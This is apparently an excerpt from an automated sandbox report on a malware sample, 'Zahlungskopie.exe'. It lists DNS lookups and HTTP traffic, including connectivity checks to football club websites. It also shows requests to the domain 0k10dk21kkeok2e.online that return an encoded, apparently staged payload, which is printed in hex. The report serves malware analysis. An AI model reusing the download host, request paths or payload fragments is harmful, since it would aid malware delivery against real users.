                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.514110088 CET8.8.8.8192.168.2.40x7e24No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.29A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.514110088 CET8.8.8.8192.168.2.40x7e24No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.103A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.668900013 CET8.8.8.8192.168.2.40x4656No error (0)www.liverpoolfc.comd2hhwit6pbhmvu.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.668900013 CET8.8.8.8192.168.2.40x4656No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.34A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.668900013 CET8.8.8.8192.168.2.40x4656No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.58A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.668900013 CET8.8.8.8192.168.2.40x4656No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.29A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.668900013 CET8.8.8.8192.168.2.40x4656No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.103A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.735830069 CET8.8.8.8192.168.2.40xee4eNo error (0)www.liverpoolfc.comd2hhwit6pbhmvu.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.735830069 CET8.8.8.8192.168.2.40xee4eNo error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.29A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.735830069 CET8.8.8.8192.168.2.40xee4eNo error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.34A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.735830069 CET8.8.8.8192.168.2.40xee4eNo error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.58A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.735830069 CET8.8.8.8192.168.2.40xee4eNo error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.103A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.613145113 CET8.8.8.8192.168.2.40x50afNo error (0)www.realmadrid.comrealmadrid.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.673063993 CET8.8.8.8192.168.2.40x7a30No error (0)www.realmadrid.comrealmadrid.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.814052105 CET8.8.8.8192.168.2.40x3cfdNo error (0)www.realmadrid.comrealmadrid.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.869771004 CET8.8.8.8192.168.2.40x4609No error (0)www.realmadrid.comrealmadrid.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:09:05.645148039 CET8.8.8.8192.168.2.40x5427No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:09:08.949892044 CET8.8.8.8192.168.2.40x8278No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)

                                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                                        • www.chelseafc.com
                                                                                                                                                                                                                        • 0k10dk21kkeok2e.online
                                                                                                                                                                                                                        • www.liverpoolfc.com

                                                                                                                                                                                                                        HTTP Packets

                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                        0192.168.2.449719151.101.2.13380C:\Users\user\Desktop\Zahlungskopie.exe
                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.681927919 CET484OUTGET / HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Other
                                                                                                                                                                                                                        Host: www.chelseafc.com
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.722868919 CET485INHTTP/1.1 302 Found
                                                                                                                                                                                                                        Retry-After: 0
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Location: https://www.chelseafc.com/en
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Tue, 02 Mar 2021 19:08:50 GMT
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Vary: Accept-Encoding, Accept-Language
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Powered-By: Curiosity
                                                                                                                                                                                                                        X-Geo-Country_code: CH


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                        1192.168.2.449729104.21.59.14880C:\Users\user\Desktop\Zahlungskopie.exe
                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                        Mar 2, 2021 20:08:54.968324900 CET1160OUTGET /base/83650593F542427F159D29BCCFD755F9.html HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Other
                                                                                                                                                                                                                        Host: 0k10dk21kkeok2e.online
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Mar 2, 2021 20:08:55.200912952 CET1163INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Tue, 02 Mar 2021 19:08:55 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Set-Cookie: __cfduid=da0b1b2a1770f6711ad92a3266a09263e1614712135; expires=Thu, 01-Apr-21 19:08:55 GMT; path=/; domain=.0k10dk21kkeok2e.online; HttpOnly; SameSite=Lax
                                                                                                                                                                                                                        Last-Modified: Mon, 01 Mar 2021 21:09:47 GMT
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                        cf-request-id: 0895f0f55c00004e321599d000000001
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=dqNIcbVpbwO2NBQ5ESskXMQW0xDjw0f7UXcFUVF9niTjiunG037%2BdB0jixI6PSyQZhzHpHlvBAL1N1uxKY3xjuk%2F77y6a%2B6ea4wZw2FbuseZNp9iNTai"}],"max_age":604800,"group":"cf-nel"}
                                                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 629cea9bcb7d4e32-FRA
                                                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                        Data Raw: 37 63 37 61 0d 0a 3c 70 3e 66 66 6b 57 6f 6b 4b 63 63 6b 6f 6b 55 6b 6f 6b 6f 6b 6f 6b 63 6b 6f 6b 6f 6b 6f 6b 61 49 49 6b 61 49 49 6b 6f 6b 6f 6b 4b 62 63 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6a 63 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 4b 61 62 6b 6f 6b 6f 6b 6f 6b 4b 63 6b 55 4b 6b 4b 62 6a 6b 4b 63 6b 6f 6b 4b 62 6f 6b 57 6b 61 6f 49 6b 55 55 6b 4b 62 63 6b 4b 6b 66 6a 6b 61 6f 49 6b 55 55 6b 62 63 6b 4b 6f 63 6b 4b 6f 49 6b 4b 4b 49 6b 55 61 6b 4b 4b 61 6b 4b 4b 63 6b 4b 4b 4b 6b 4b 6f 55 6b 4b 4b 63 6b 57 66 6b 4b 6f 57 6b 55 61 6b 57 57 6b 57 66 6b 4b 4b 6f 6b 4b 4b 6f 6b 4b 4b 4b 6b 4b 4b 6a 6b 55 61 6b 57 62 6b 4b 6f 4b 6b 55 61 6b 4b 4b 63 6b 4b 4b 66 6b 4b 4b 6f 6b 55 61 6b 4b 6f 49 6b 4b 4b 6f 6b 55 61 6b 6a 62 6b 66 57 6b 62 55 6b 55 61 6b 4b 6f 57 6b 4b 4b 4b 6b 4b 6f 6f 6b 4b 6f 4b 6b 63 6a 6b 4b 55 6b 4b 55 6b 4b 6f 6b 55 6a 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 62 6f 6b 6a 57 6b 6f 6b 6f 6b 66 6a 6b 4b 6b 55 6b 6f 6b 57 66 6b 4b 55 62 6b 4b 49 62 6b 61 61 6a 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 61 61 63 6b 6f 6b 55 63 6b 6f 6b 4b 4b 6b 4b 6b 62 6f 6b 6f 6b 6f 6b 4b 63 6b 4b 6f 6b 6f 6b 6f 6b 6a 6b 6f 6b 6f 6b 6f 6b 6f
                                                                                                                                                                                                                        Data Ascii: 7c7a<p>ffkWokKcckokUkokokokckokokokaIIkaIIkokokKbckokokokokokokokjckokokokokokokokokokokokokokokokokokokokokokokokokokokokokokokokokokokokKabkokokokKckUKkKbjkKckokKbokWkaoIkUUkKbckKkfjkaoIkUUkbckKockKoIkKKIkUakKKakKKckKKKkKoUkKKckWfkKoWkUakWWkWfkKKokKKokKKKkKKjkUakWbkKoKkUakKKckKKfkKKokUakKoIkKKokUakjbkfWkbUkUakKoWkKKKkKookKoKkcjkKUkKUkKokUjkokokokokokokokbokjWkokokfjkKkUkokWfkKUbkKIbkaajkokokokokokokokokaackokUckokKKkKkbokokokKckKokokokjkokokoko
                                                                                                                                                                                                                        Mar 2, 2021 20:08:55.200946093 CET1164INData Raw: 6b 6f 6b 6f 6b 4b 57 6f 6b 63 63 6b 4b 6f 6b 6f 6b 6f 6b 55 61 6b 6f 6b 6f 6b 6f 6b 6a 63 6b 4b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 4b 6a 6b 6f 6b 55 61 6b 6f 6b 6f 6b 6f 6b 61 6b 6f 6b 6f 6b 63 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6f 6b 6a 6b 6f 6b
                                                                                                                                                                                                                        Data Ascii: kokokKWokcckKokokokUakokokokjckKokokokokokKjkokUakokokokakokokckokokokokokokokjkokokokokokokokokKabkKokokokakokokokokokokakokWjkKUUkokokKjkokokKjkokokokokKjkokokKjkokokokokokokKjkokokokokokokokokokokokKookcckKokokbfkokokokokjckKokokKjckUkokoko
                                                                                                                                                                                                                        Mar 2, 2021 20:08:55.200969934 CET1165INData Raw: 6f 6b 6f 6b 61 6b 4b 61 62 6b 4b 4b 6b 6f 6b 6f 6b 63 6b 63 61 6b 55 6f 6b 61 6b 63 6f 6b 4b 49 6a 6b 6f 6b 6f 6b 4b 6f 6b 63 61 6b 61 63 6a 6b 63 6f 6b 63 6a 6b 6f 6b 6f 6b 6a 6b 63 6f 6b 63 66 6b 6f 6b 6f 6b 6a 6b 63 6f 6b 4b 4b 6b 6f 6b 6f 6b
                                                                                                                                                                                                                        Data Ascii: okokakKabkKKkokokckcakUokakcokKIjkokokKokcakacjkcokcjkokokjkcokcfkokokjkcokKKkokokcUkKabkUakokokckcokcbkokokjkcokcWkokokjkcokKakokokcUkKabkUUkokokckcokIokokokjkcokIKkokokjkcokKUkokokcUkKabkUckokokckcakKjjkcokKIfkokokKokcokIakokokjkKKKkKIbkokok
                                                                                                                                                                                                                        Mar 2, 2021 20:08:55.200990915 CET1167INData Raw: 6b 63 62 6b 4b 49 66 6b 55 66 6b 55 61 6b 55 6b 6f 6b 6f 6b 6f 6b 55 4b 6b 49 6a 6b 4b 49 66 6b 55 66 6b 55 61 6b 55 6b 6f 6b 6f 6b 6f 6b 55 4b 6b 57 57 6b 4b 49 66 6b 55 66 6b 61 49 6b 55 4b 6b 4b 61 55 6b 4b 49 66 6b 55 66 6b 55 61 6b 61 6b 6f
                                                                                                                                                                                                                        Data Ascii: kcbkKIfkUfkUakUkokokokUKkIjkKIfkUfkUakUkokokokUKkWWkKIfkUfkaIkUKkKaUkKIfkUfkUakakokokokUKkIjkKIfkUfkUakakokokokUKkIIkKIfkUfkUakakokokokUKkIokKIfkUfkackUKkKaIkKIfkUfkUakKkokokokUKkIjkKIfkUfkUakKkokokokUKkIckKIfkUfkUakKkokokokUKkIIkKIfkUfkaUkUKk
                                                                                                                                                                                                                        Mar 2, 2021 20:08:55.201014042 CET1168INData Raw: 55 66 6b 55 4b 6b 4b 6f 6b 55 4b 6b 4b 6f 4b 6b 4b 49 66 6b 55 66 6b 55 61 6b 57 6b 6f 6b 6f 6b 6f 6b 55 4b 6b 4b 6f 6f 6b 4b 49 66 6b 55 66 6b 55 61 6b 57 6b 6f 6b 6f 6b 6f 6b 55 4b 6b 49 4b 6b 4b 49 66 6b 55 66 6b 55 61 6b 57 6b 6f 6b 6f 6b 6f
                                                                                                                                                                                                                        Data Ascii: UfkUKkKokUKkKoKkKIfkUfkUakWkokokokUKkKookKIfkUfkUakWkokokokUKkIKkKIfkUfkUakWkokokokUKkWfkKIfkUfkUKkWkUKkWWkKIfkUfkUakbkokokokUKkIUkKIfkUfkUakbkokokokUKkIokKIfkUfkUakbkokokokUKkIIkKIfkUfkUokUKkKKokKIfkUfkUakfkokokokUKkIUkKIfkUfkUakfkokokokUKkWf
                                                                                                                                                                                                                        Mar 2, 2021 20:08:55.201037884 CET1169INData Raw: 6b 4b 49 6b 6f 6b 6f 6b 6f 6b 55 4b 6b 49 63 6b 4b 49 66 6b 55 66 6b 55 61 6b 4b 49 6b 6f 6b 6f 6b 6f 6b 55 4b 6b 49 6f 6b 4b 49 66 6b 55 66 6b 55 61 6b 4b 49 6b 6f 6b 6f 6b 6f 6b 55 4b 6b 49 55 6b 4b 49 66 6b 55 66 6b 55 4b 6b 4b 49 6b 55 4b 6b
                                                                                                                                                                                                                        Data Ascii: kKIkokokokUKkIckKIfkUfkUakKIkokokokUKkIokKIfkUfkUakKIkokokokUKkIUkKIfkUfkUKkKIkUKkcjkKIfkUfkUakKckokokokUKkIckKIfkUfkUakKckokokokUKkIjkKIfkUfkUakKckokokokUKkIakKIfkUfkUKkKckUKkKKokKIfkUfkUakKUkokokokUKkWWkKIfkUfkUakKUkokokokUKkIKkKIfkUfkUakKUk
                                                                                                                                                                                                                        Mar 2, 2021 20:08:55.201061964 CET1171INData Raw: 6f 6b 6f 6b 55 4b 6b 49 55 6b 4b 49 66 6b 55 66 6b 61 55 6b 55 4b 6b 63 62 6b 4b 49 66 6b 55 66 6b 55 61 6b 6f 6b 6f 6b 6f 6b 6f 6b 55 4b 6b 57 57 6b 4b 49 66 6b 55 66 6b 55 61 6b 6f 6b 6f 6b 6f 6b 6f 6b 55 4b 6b 49 55 6b 4b 49 66 6b 55 66 6b 55
                                                                                                                                                                                                                        Data Ascii: okokUKkIUkKIfkUfkaUkUKkcbkKIfkUfkUakokokokokUKkWWkKIfkUfkUakokokokokUKkIUkKIfkUfkUakokokokokUKkIckKIfkUfkaakUKkKaUkKIfkKKIkaKkokokKokokaIckKakKkokcokafkokokKokKKKkUKkokokKokokaIckKakUkokKKKkUokokokKokUKkKKokKcKkIakokokKkUfkUakKoWkokokokUKkKoKk
                                                                                                                                                                                                                        Mar 2, 2021 20:08:55.201083899 CET1172INData Raw: 6b 6f 6b 6f 6b 6f 6b 55 4b 6b 4b 6f 6f 6b 4b 49 66 6b 55 66 6b 55 61 6b 57 62 6b 6f 6b 6f 6b 6f 6b 55 4b 6b 49 6a 6b 4b 49 66 6b 55 66 6b 55 4b 6b 57 62 6b 55 4b 6b 62 61 6b 4b 49 66 6b 55 66 6b 55 61 6b 57 66 6b 6f 6b 6f 6b 6f 6b 55 4b 6b 4b 6f
                                                                                                                                                                                                                        Data Ascii: kokokokUKkKookKIfkUfkUakWbkokokokUKkIjkKIfkUfkUKkWbkUKkbakKIfkUfkUakWfkokokokUKkKookKIfkUfkUakWfkokokokUKkIIkKIfkUfkUakWfkokokokUKkcbkKIfkUfkUKkWfkUKkcfkKIfkUfkUakWjkokokokUKkcWkKIfkUfkUakWjkokokokUKkIfkKIfkUfkUakWjkokokokUKkWWkKIfkUfkUKkWjkUK
                                                                                                                                                                                                                        Mar 2, 2021 20:08:55.201107979 CET1174INData Raw: 4b 6b 49 61 6b 4b 49 66 6b 55 66 6b 55 61 6b 62 63 6b 6f 6b 6f 6b 6f 6b 55 4b 6b 49 55 6b 4b 49 66 6b 55 66 6b 55 4b 6b 62 63 6b 55 4b 6b 6a 62 6b 4b 49 66 6b 55 66 6b 55 61 6b 62 55 6b 6f 6b 6f 6b 6f 6b 55 4b 6b 57 57 6b 4b 49 66 6b 55 66 6b 55
                                                                                                                                                                                                                        Data Ascii: KkIakKIfkUfkUakbckokokokUKkIUkKIfkUfkUKkbckUKkjbkKIfkUfkUakbUkokokokUKkWWkKIfkUfkUakbUkokokokUKkWfkKIfkUfkUakbUkokokokUKkIckKIfkUfkUKkbUkUKkKKjkKIfkUfkUakbakokokokUKkIfkKIfkUfkUakbakokokokUKkIckKIfkUfkUakbakokokokUKkKoKkKIfkUfkUKkbakUKkKKckKIf
                                                                                                                                                                                                                        Mar 2, 2021 20:08:55.201131105 CET1175INData Raw: 66 6b 55 61 6b 66 6f 6b 6f 6b 6f 6b 6f 6b 55 4b 6b 49 63 6b 4b 49 66 6b 55 66 6b 55 4b 6b 66 6f 6b 55 4b 6b 66 6a 6b 4b 49 66 6b 55 66 6b 55 61 6b 6a 57 6b 6f 6b 6f 6b 6f 6b 55 4b 6b 63 62 6b 4b 49 66 6b 55 66 6b 55 61 6b 6a 57 6b 6f 6b 6f 6b 6f
                                                                                                                                                                                                                        Data Ascii: fkUakfokokokokUKkIckKIfkUfkUKkfokUKkfjkKIfkUfkUakjWkokokokUKkcbkKIfkUfkUakjWkokokokUKkIKkKIfkUfkUakjWkokokokUKkIjkKIfkUfkUKkjWkUKkKookKIfkUfkUakjbkokokokUKkIckKIfkUfkUakjbkokokokUKkWbkKIfkUfkUakjbkokokokUKkWWkKIfkUfkUKkjbkUKkKKokKIfkUfkUakjfko
                                                                                                                                                                                                                        Mar 2, 2021 20:08:55.201786041 CET1176INData Raw: 6b 55 4b 6b 4b 6f 6f 6b 4b 49 66 6b 55 66 6b 55 4b 6b 49 6a 6b 55 4b 6b 55 63 6b 4b 49 66 6b 55 66 6b 55 61 6b 49 49 6b 6f 6b 6f 6b 6f 6b 55 4b 6b 4b 6f 4b 6b 4b 49 66 6b 55 66 6b 55 61 6b 49 49 6b 6f 6b 6f 6b 6f 6b 55 4b 6b 49 66 6b 4b 49 66 6b
                                                                                                                                                                                                                        Data Ascii: kUKkKookKIfkUfkUKkIjkUKkUckKIfkUfkUakIIkokokokUKkKoKkKIfkUfkUakIIkokokokUKkIfkKIfkUfkUakIIkokokokUKkIKkKIfkUfkUKkIIkUKkUckKIfkUfkUakIckokokokUKkIfkKIfkUfkUakIckokokokUKkIakKIfkUfkUakIckokokokUKkIfkKIfkUfkUKkIckUKkUakKIfkUfkUakIUkokokokUKkWbkKI
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.150091887 CET2236OUTGET /base/0A48866E716B370203D6A936495BDF28.html HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Other
                                                                                                                                                                                                                        Host: 0k10dk21kkeok2e.online
                                                                                                                                                                                                                        Mar 2, 2021 20:08:56.367968082 CET2245INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Tue, 02 Mar 2021 19:08:56 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Set-Cookie: __cfduid=d696250e97b654e4823691154837763731614712136; expires=Thu, 01-Apr-21 19:08:56 GMT; path=/; domain=.0k10dk21kkeok2e.online; HttpOnly; SameSite=Lax
                                                                                                                                                                                                                        Last-Modified: Mon, 01 Mar 2021 21:09:49 GMT
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                        cf-request-id: 0895f0f9f700004e32e1b4d000000001
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=HJfNTooJlDCkpIQk1k2cCvLNdbksx2F1qhEX2xPK0OsfuKfa2LdIQJVVFy4%2F9fIP2rW3Df3tX%2FFOca1FfxlRnYkZjU6YJCdiqb%2BoXLQaTP7jQTLQzWIT"}],"max_age":604800,"group":"cf-nel"}
                                                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 629ceaa328c94e32-FRA
                                                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                        Data Raw: 37 63 37 61 0d 0a 3c 70 3e 6b 4b 6f 57 6b 4b 6f 63 6b 57 6f 6b 57 6f 6b 4b 6f 49 6b 4b 6f 55 6b 4b 57 62 6b 4b 57 66 6b 4b 49 55 6b 4b 49 4b 6b 61 61 63 6b 61 61 55 6b 4b 66 62 6b 4b 66 62 6b 63 6b 61 4b 61 6b 61 55 6f 6b 61 55 6f 6b 61 4b 55 6b 61 4b 4b 6b 4b 55 61 6b 4b 55 4b 6b 4b 63 57 6b 4b 63 66 6b 61 61 4b 6b 61 61 6f 6b 4b 66 63 6b 4b 66 63 6b 66 61 6b 6a 66 6b 63 6a 6b 63 6a 6b 61 55 66 6b 61 55 49 6b 4b 4b 49 6b 4b 4b 63 6b 55 6a 6b 55 63 6b 6a 6b 49 6b 49 55 6b 49 55 6b 62 57 6b 63 4b 6b 57 4b 6b 57 4b 6b 4b 62 57 6b 4b 62 66 6b 4b 6f 61 6b 4b 6f 4b 6b 61 63 66 6b 61 63 49 6b 4b 62 4b 6b 4b 62 6f 6b 4b 55 61 6b 4b 55 61 6b 61 55 49 6b 61 55 6f 6b 61 4b 63 6b 61 4b 63 6b 63 57 6b 63 66 6b 61 61 62 6b 61 61 66 6b 4b 61 6f 6b 4b 4b 62 6b 4b 66 6b 4b 6a 6b 57 6a 6b 57 6a 6b 6a 63 6b 4b 49 6b 6a 55 6b 6a 55 6b 4b 49 6a 6b 4b 49 63 6b 63 66 6b 63 6a 6b 6a 6f 6b 49 62 6b 6a 61 6b 6a 4b 6b 66 61 6b 66 61 6b 55 4b 6b 61 49 6b 4b 6f 49 6b 4b 6f 49 6b 61 55 63 6b 61 55 61 6b 57 4b 6b 57 6f 6b 66 55 6b 66 4b 6b 4b 6f 57 6b 4b 6f 62 6b 61 63 6b 61 63 6b 61 63 61 6b 4b 57 55 6b 4b 62 6f 6b 4b 62 6f 6b 4b 6f 63 6b 4b 6f 61 6b 4b 63 6f 6b 4b 55 57 6b 4b 49 61 6b 4b 49 6f 6b 4b 49 6a 6b 4b 49 49 6b 4b 6a 57 6b 4b 6a 57 6b 4b 6f 49 6b 57 57 6b 61 55 6b 61 55 6b 61 63 63 6b 61 63 61 6b 61 49 6f 6b 61 63 57 6b 4b 4b 49 6b 4b 4b 55 6b 61 49 61
                                                                                                                                                                                                                        Data Ascii: 7c7a<p>kKoWkKockWokWokKoIkKoUkKWbkKWfkKIUkKIKkaackaaUkKfbkKfbkckaKakaUokaUokaKUkaKKkKUakKUKkKcWkKcfkaaKkaaokKfckKfckfakjfkcjkcjkaUfkaUIkKKIkKKckUjkUckjkIkIUkIUkbWkcKkWKkWKkKbWkKbfkKoakKoKkacfkacIkKbKkKbokKUakKUakaUIkaUokaKckaKckcWkcfkaabkaafkKaokKKbkKfkKjkWjkWjkjckKIkjUkjUkKIjkKIckcfkcjkjokIbkjakjKkfakfakUKkaIkKoIkKoIkaUckaUakWKkWokfUkfKkKoWkKobkackackacakKWUkKbokKbokKockKoakKcokKUWkKIakKIokKIjkKIIkKjWkKjWkKoIkWWkaUkaUkacckacakaIokacWkKKIkKKUkaIa


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                        2192.168.2.44973399.86.159.2980C:\Users\user\Desktop\Zahlungskopie.exe
                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.559750080 CET3343OUTGET / HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Other
                                                                                                                                                                                                                        Host: www.liverpoolfc.com
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.603986025 CET3343INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                        Server: CloudFront
                                                                                                                                                                                                                        Date: Tue, 02 Mar 2021 19:08:57 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 183
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Location: https://www.liverpoolfc.com/
                                                                                                                                                                                                                        X-Cache: Redirect from cloudfront
                                                                                                                                                                                                                        Via: 1.1 20f1bd00b8898dc48034147896cabd75.cloudfront.net (CloudFront)
                                                                                                                                                                                                                        X-Amz-Cf-Pop: MXP64-C2
                                                                                                                                                                                                                        X-Amz-Cf-Id: al8HpbvRKomJtSYRJGkdMV-z7mJgmxwuv0fEEvKhoo6OCRjJeZb-Ww==
                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


                                                                                                                                                                                                                        HTTPS Packets

                                                                                                                                                                                                                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.827697039 CET99.86.159.34443192.168.2.449734CN=*.liverpoolfc.com CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USFri Feb 12 01:00:00 CET 2021 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009Mon Mar 14 00:59:59 CET 2022 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                                                                                                                                                                                                        CN=Amazon, OU=Server CA 1B, O=Amazon, C=USCN=Amazon Root CA 1, O=Amazon, C=USThu Oct 22 02:00:00 CEST 2015Sun Oct 19 02:00:00 CEST 2025
                                                                                                                                                                                                                        CN=Amazon Root CA 1, O=Amazon, C=USCN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USMon May 25 14:00:00 CEST 2015Thu Dec 31 02:00:00 CET 2037
                                                                                                                                                                                                                        CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 02 02:00:00 CEST 2009Wed Jun 28 19:39:16 CEST 2034

                                                                                                                                                                                                                        Code Manipulations

